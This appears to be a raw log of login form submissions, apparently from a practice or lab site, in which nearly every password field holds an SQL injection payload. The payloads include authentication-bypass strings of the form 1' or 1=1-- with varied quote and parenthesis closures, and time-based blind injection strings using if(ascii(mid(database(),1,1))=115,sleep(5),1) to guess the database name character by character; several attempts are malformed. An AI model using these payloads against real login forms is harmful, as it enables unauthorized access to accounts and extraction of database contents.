User Name:gege
Password:gege
User Name:123
Password:1' or 1=1-- 
User Name:geeg
Password:1" or 1=1-- 
User Name:ge
Password:1' or 1=1-- 
User Name:24343
Password:1') or 1=1-- 
User Name:ffe
Password:1' or if(ascii(mid(database(),1,1)))=115-- 
User Name:ge
Password:' or if(ascii(mid(database())=115,sleep(5),1)-- '
User Name:gege
Password:' or if(ascii(mid(database(),1,1)=115,sleep(5),1)-- '
User Name:gege
Password:' or if(ascii(mid(database(),1,1))=115,sleep(5),1)-- ')
User Name:ewe
Password:1' or if(ascii(mid(database(),1,1))=115,sleep(5),1)-- '
User Name:ge
Password:1" or if(ascii(mid(database(),1,1))=115,sleep(5),1)-- '
User Name:gege
Password:1') or if(ascii(mid(database(),1,1))=115,sleep(5),1)-- '
User Name:43
Password:1')) or if(ascii(mid(database(),1,1))=115,sleep(5),1)-- '
User Name:fefe
Password:1")) or if(ascii(mid(database(),1,1))=115,sleep(5),1)-- '
User Name:gege
Password:1')) or if(ascii(mid(database(),1,1))=115,sleep(5),1)-- '
User Name:gege
Password:1" or if(ascii(mid(database(),1,1))=115,sleep(5),1)-- '
User Name:gege
Password:1' or if(ascii(mid(database(),1,1))=115,sleep(5),1)-- '
User Name:gegege
Password:1) or if(ascii(mid(database(),1,1))=115,sleep(5),1)-- '
User Name:gege
Password:1) or if(ascii(mid(database(),1,1))=115,sleep(5),1)-- '
User Name:fefe
Password:1") or if(ascii(mid(database(),1,1))=115,sleep(5),1)-- '
User Name:fefe
Password:1") or if(ascii(mid(database(),1,1))=115,sleep(5),1)-- '
User Name:fefe
Password:1") or if(ascii(mid(database(),1,1))=115,sleep(5),1)-- '
User Name:fefe
Password:1") or if(ascii(mid(database(),1,1))=116,sleep(5),1)-- '
User Name:fefe
Password:1") or if(ascii(mid(database(),1,1))=116,sleep(5),1)-- '
User Name:gegeeg
Password:1") or if(ascii(mid(database(),1,1))=116,sleep(5),1)-- '
User Name:gege
Password:1") or if(ascii(mid(database(),1,1))=116,sleep(5),1)-- 
User Name:123
Password:1") or if(ascii(mid(database(),1,1))=115,sleep(5),1)-- '
